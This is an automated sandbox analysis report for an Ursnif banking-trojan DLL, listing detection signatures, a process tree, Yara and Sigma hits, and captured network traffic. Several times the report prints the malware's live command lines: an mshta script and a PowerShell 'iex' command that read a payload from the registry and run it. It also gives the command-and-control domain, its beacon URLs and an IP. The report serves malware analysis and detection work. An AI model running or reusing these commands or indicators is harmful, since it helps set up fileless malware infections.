Windows Analysis Report gECym.bin

Overview

General Information

Sample Name: gECym.bin (renamed file extension from bin to dll)
Analysis ID: 506330
MD5: fcb53acd5fd1637a2ac1bc69f396e92c
SHA1: a09432a56375c5a39856d59e402c3f8642edda7b
SHA256: cc7045d9fe77c4aa4cb646d01fb4700008a34f58f49358d0b0b0997d21016aab
Tags: 7412, exe, greenpass, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2908 cmdline: loaddll32.exe 'C:\Users\user\Desktop\gECym.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5032 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4892 cmdline: rundll32.exe 'C:\Users\user\Desktop\gECym.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 1368 cmdline: regsvr32.exe /s C:\Users\user\Desktop\gECym.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 2376 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2856 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2376 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 4908 cmdline: rundll32.exe C:\Users\user\Desktop\gECym.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4864 cmdline: rundll32.exe C:\Users\user\Desktop\gECym.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6232 cmdline: rundll32.exe C:\Users\user\Desktop\gECym.dll,DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • mshta.exe (PID: 5352 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Kf7p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kf7p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5956 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4856 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 2620 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ns0e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ns0e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1640 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(50 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.rundll32.exe.2a90000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.f30000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.10000000.3.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.10000000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.37194a0.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(2 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856
Sigma detected: Mshta Spawning Windows Shell
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Acbs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acbs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UrlsReturn)), ProcessId: 4856

                      Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: gECym.dll, Virustotal: Detection: 10%
Source: 0.2.loaddll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: gECym.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown, HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: aaaa.bar
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 31.220.111.98 187
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown, Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown, Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown, Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown, Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown, Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49824
Source: loaddll32.exe, 00000000.00000003.725335981.000000000124A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.769019185.0000000003322000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.750727112.0000000003333000.00000004.00000001.sdmp, String found in binary or memory: https://aaaa.bar/
Source: loaddll32.exe, 00000000.00000002.798277026.0000000001160000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp, String found in binary or memory: https://aaaa.bar/jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2
Source: loaddll32.exe, 00000000.00000002.800982427.000000000123F000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp, String found in binary or memory: https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF
Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp, String found in binary or memory: https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu
Source: unknown, DNS traffic detected: queries for: www.msn.com
Source: global traffic, HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1 | Accept: application/javascript, */*;q=0.8 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: geolocation.onetrust.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1 | Accept: application/javascript, */*;q=0.8 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: btloader.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /px.gif?ch=1&e=0.9973131461099627 HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: ad-delivery.net | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: ad.doubleclick.net | Connection: Keep-Alive | Cookie: IDE=AHWqTUkh5fOLAUMX20ZV8xqf__2tu45ymTec8GQqE60qWk9cSV6VA3zk_7PBuUk4
Source: global traffic, HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache
